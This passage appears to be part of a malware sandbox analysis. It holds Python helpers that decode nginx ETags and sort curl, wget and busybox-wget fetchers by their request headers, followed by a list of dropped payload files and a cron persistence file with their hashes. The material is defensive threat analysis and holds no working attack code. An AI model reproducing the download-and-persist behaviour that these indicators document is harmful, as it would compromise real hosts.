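    m = NGINX_ETAG_RE.match(etag)
    if not m:
        return None
    mtime = datetime.fromtimestamp(int(m.group(1), 16), tz=timezone.utc)
    return mtime, int(m.group(2), 16)


def check_payload_response(raw):
    """Cross-check the ETag against Content-Length and Last-Modified.
    A mismatch means the ETag is not nginx's default or the headers were altered in transit."""
    _, h = parse_message(raw)
    decoded = decode_nginx_etag(h.get("etag", ""))
    if decoded is None:
        return {"nginx_etag": False}
    mtime, size = decoded
    return {
        "nginx_etag": True,
        "size": size,
        "size_matches": size == int(h["content-length"]),
        "mtime": mtime.isoformat(),
        "mtime_matches": mtime == parsedate_to_datetime(h["last-modified"]),
        "from_cache": h.get("x-cache-status", "").upper() == "HIT",
    }


def payload_sizes(payloads=PAYLOADS):
    """Decoded size for every payload whose ETag agrees with its Content-Length."""
    out = {}
    for name, (etag, clen) in payloads.items():
        decoded = decode_nginx_etag(etag)
        if decoded and decoded[1] == clen:
            out[name] = decoded[1]
    return out


def classify_fetcher(raw_request):
    """Tell the three downloaders apart: GNU wget and curl put a version in the UA,
    the busybox wget applet sends a bare "Wget" and Connection: close."""
    _, h = parse_message(raw_request)
    ua = h.get("user-agent", "")
    if ua.startswith("curl/"):
        return "curl"
    if ua.startswith("Wget/"):
        return "gnu-wget"
    if ua == "Wget" and h.get("connection", "").lower() == "close":
        return "busybox-wget"
    return "unknown"
```

For this run all four ETags decode cleanly: the sizes equal the Content-Length values and the modification times are 10:00:01 to 10:00:03 UTC on 28 Feb 2025, i.e. the builds were published on the server under two hours before the sandbox fetched them. Two hosts returning the same mtime-size pair are serving the same build regardless of the URL path, so the decoded pair is a better pivot than the randomised filename.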

                    MITRE ATT&CK Enterprise v15


                    Downloads

                    • /tmp/6me8L28qp8ZMXxRxrvwNjMhj066PYl9ckx

                      Filesize

                      119KB

                      MD5

                      1b166b95f9cb4b079ef1b9ec8363ddf3

                      SHA1

                      0d8eb08add467b3b5474f9b25909297fe7c2839c

                      SHA256

                      94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                      SHA512

                      983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                    • /tmp/j7YkHCn9eenbdEJjjSe4RAXf34IgXaWdQh

                      Filesize

                      122KB

                      MD5

                      cd3d4b9c643e5b473fb4d88ed05f0716

                      SHA1

                      64ee7a97418583d759eaea8000890cc3bae1b5f4

                      SHA256

                      0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                      SHA512

                      164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                    • /tmp/jt9jGRCBvs5W4HfojuNQa26eGDclv8ZsGN

                      Filesize

                      99KB

                      MD5

                      9438d9bc392bcf300a5583b6df5bc8f6

                      SHA1

                      375a6ae34b516f6f3eeea8030c4084f585017efa

                      SHA256

                      68e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e

                      SHA512

                      1f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860

                    • /tmp/tylUfEdLd2Ho2FuUE0FT8yrYykEPgRIIQq

                      Filesize

                      151KB

                      MD5

                      6c583043d91c55aa470c08c87058e917

                      SHA1

                      abf65a5b9bba69980278ad09356e53de8bb89439

                      SHA256

                      2d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948

                      SHA512

                      82ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5

                    • /var/spool/cron/crontabs/tmp.kxiaYZ

                      Filesize

                      210B

                      MD5

                      077a8703169311bb58b8dc6f3872b5ef

                      SHA1

                      1a6e0f3e16e1e21d753d4789d1058438379812f0

                      SHA256

                      8d9d7ac5f9b41925d157d40ada63636ac21e0bb928d26a64375924a65739201d

                      SHA512

                      75bf5d7195c1fb70981bb554dceb393ac32e59b25ef220dd02f5d4473c101bd6a06e2f847f51784188d87633e08ef045ee29933ef9738d603566c59bbd9ac7c3
